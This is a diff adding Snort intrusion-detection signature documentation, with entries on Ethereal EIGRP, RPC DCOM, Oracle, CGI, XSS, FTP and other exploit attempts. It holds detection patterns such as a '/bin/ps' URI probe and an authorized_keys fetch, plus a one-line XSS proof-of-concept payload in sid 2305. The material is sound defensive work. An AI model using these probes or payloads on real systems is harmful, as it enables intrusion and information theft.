+ip_proto:88; byte_test:1,>,32,44; reference:cve,CAN-2004-0176;
+reference:bugtraq,9952; classtype:attempted-admin; sid:2464; rev:1;)
+
+--
+Sid:
+2464
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Ethereal decode of the Enhanced Interior Gateway Routing Protocol 
+(EIGRP).
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root or
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability associated with particular versions of Ethereal that
+may cause a buffer overflow when a malformed EIGRP packet is decoded.  This
+may permit the execution of arbitrary code with root or LOCAL_SYSTEM privilege.
+The buffer overflow occurs when a larger than expected packet length value is
+discovered in the EIGRP payload.
+
+--
+Affected Systems:
+Any host running Ethereal versions 0.8.14 through 0.10.2.
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed EIGRP packet, and if decoded by
+a vulnerable version of Ethereal, can cause a buffer overflow and the 
+subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to version 0.10.3 of Ethereal.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176
+
+Bugtraq:
+http://www.securityfocus.com/bid/9952
+
+--
--- /dev/null
+++ b/doc/signatures/1927.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid: 
+1927
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+In this case, the rule will generate an event due to the attempted
+transfer of an authorized_keys file. This file is used in ssh
+communications to authenticate a user without the need for a password.
+Retrieval of this file may allow an attacker to gain valuable
+information about the hosts allowed to gain access to the machine via
+ssh, included the hostname, IP address and the username belonging to the
+authorized user. The attacker may have access to the users .ssh directory in 
+which case the public and private keys for that user may also be at risk.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+The manual page for ssh on the system in question.
+
+--
--- /dev/null
+++ b/doc/signatures/2891.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2891
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_number
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1585.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1585
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3319.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3319
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/836.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+836
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/225.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+225
+
+--
+Summary:
+This event is generated when the Stacheldraht DDoS tool is used.
+
+--
+Impact:
+This indicates that a Stacheldraht agent exists on the source host and a handler exists on the destination host.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler may probe for a Stacheldraht agent.  There is also "gag" program used to scan for Stacheldraht agents.  A response to a "gag" request will be an ICMP echo reply with an ICMP identification number of 669 and a string of "sicken" in the payload.  
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A handler may probe for a Stacheldraht agent or the "gag" program can be used to discover Stacheldraht agents.  The "gag" program can be run by a defender of a network if there is a suspected Stacheldraht agent on the network. An attacker could also run the "gag" program to find an agent.
+
+
+--
+Ease of Attack:
+Simple. The "gag" script is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Turn of all unnecessary services on hosts.
+
+Upgrade to the latest patch level.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS195
+
+--
--- /dev/null
+++ b/doc/signatures/655.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+655
+
+--
+Summary:
+This event is generated when a buffer overflow is attempted on a Sendmail 8.6.9 server.
+
+--
+Impact:
+Attempted administrator access.  A successful buffer overflow attack can allow a remote attacker access to the Sendmail server at the privilege level of the user ID associated with Sendmail.
+
+--
+Detailed Information:
+A vulnerability exists in Sendmail version 8.6.9 that can be exploited by a buffer overflow attack.  This allows the attacker access to the Sendmail server at the privilege level of the user ID associated with Sendmail.  This attack can occur when a Sendmail server connects back to the ident service of the client requesting the Sendmail connection.  Because it is improperly validated by the Sendmail server, a malicious response can cause a buffer overflow. 
+
+--
+Affected Systems:
+Sendmail version 8.6.9.
+
+--
+Attack Scenarios:
+An attacker can request a connection to a Sendmail server, listen for the request for the ident service, and respond with a malicious payload to exploit the vulnerability.
+
+--
+Ease of Attack:
+Easy.  Exploit code is available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to a Sendmail version greater than 8.6.9.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Rule updated by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+
+--
--- /dev/null
+++ b/doc/signatures/704.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+704
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000504.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000504
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "media.php" using a remote file being passed as the 
+"DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "media.php" script used by 
+the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2888.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2888
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_char
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3197.txt
@@ -0,0 +1,84 @@
+Rule:
+
+--
+Sid:
+3197
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This event indicates that an attempt to exploit this vulnerability via
+the ISystemActivator component has been made.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/1227.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1227
+
+--
+Summary:
+This event is generated when an attempt is made to communicate to an internal host from a remote X server session.
+
+--
+Impact:
+Remote access.  This attack may indicate that an internal host has been compromised and has been configured to offer remote access through an xterm session.
+
+--
+Detailed Information:
+Traffic from source ports 6000 through 6005 inclusive may indicate that an internal host is communicating with an external host using an xterm session.  An attacker may compromise an internal host and establish communications between the remote host and the compromised host using an xterm session.  This is particularly effective means of establishing communications because the xterm session is established by the internal host.  Typically, firewalls do not scrutinize or block outbound traffic, such as establishing an xterm session. 
+
+--
+Affected Systems:
+Host offering xterm client software. 
+
+--
+Attack Scenarios:
+An attacker may establish communications using an xterm session between a compromised host and remote host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A remote host may connect to an internal host with a source port of 6000 through 6005 inclusive.
+
+--
+False Negatives:
+If multiple concurrent xterm sessions exists, a port greater than 6005 may be selected.
+
+--
+Corrective Action:
+Block outbound xterm sessions.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Documented by  Steven Alexander<alexander.s@mccd.edu>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+Additional References:
+http://www.whitehats.com/info/IDS126
+
+--
--- /dev/null
+++ b/doc/signatures/3342.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3342
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000562.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000562
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "sort" parameter in the "show.php" script used 
+by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2303.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2303
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3229.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3229
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1328.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1328
+
+--
+Summary:
+Attempted ps command access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a
+webserver. The ps command lists the process status of running processes
+on a UNIX or Linux based system. The attacker could possibly gain
+information needed for other attacks on the system.
+
+Using "ps", the attackers would check for various running system
+services to exploit or for the presence of security software, such as
+host IDS or monitoring scripts. This rule looks for the "ps" command in
+the URI part of the client to web server connection and does not
+indicate whether the command was actually successful in displaying the
+list of processes. The presence of the "ps" command in the URI indicates
+that an attacker attempted to trick the web server into executing system
+commands in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ps'in
+the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. This command may also be
+requested on a command line should the attacker gain access to the
+machine. On BSD derived systems, setting the parameter
+"kern.ps_showallprocs" to zero will show only the processes being run by
+that user except for root who will still see all processes.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1329
+
+Manual page for ps.
+
+http://linux.about.com/library/cmd/blcmdl1_ps.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2305.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2305
+
+--
+Summary:
+This event is generated when an attempt is made to access the script
+chatbox.php on a web server running a PHP application.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the script
+chatbox.php on a web server. This application does not perform stringent 
+checks when validating data supplied by the user in the Name field of
+the script. HTML or script code supplied via that field may cause a
+Denial of Service condition to occur.
+
+--
+Affected Systems:
+	All systems running E107 versions 0.545 and 0.603, other versions may
+	also be affected
+
+--
+Attack Scenarios:
+The attacker could supply some offending HTML code into the name field
+and cause the DoS.
+
+--
+Ease of Attack:
+Simple.
+
+Proof of concept exists, in the name field enter:
+
+<script type=javascript>alert('foo')</script>
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3144.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3144
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/546.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 
+546
+
+--
+Summary: 
+This event is generated when an attempt is made to navigate in an FTP session to a hidden directory name that begins with a space.
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to navigate on an FTP server to a directory name that begins with a space to list or store unauthorized files such as unlicensed software.
+
+--
+Detailed Information: 
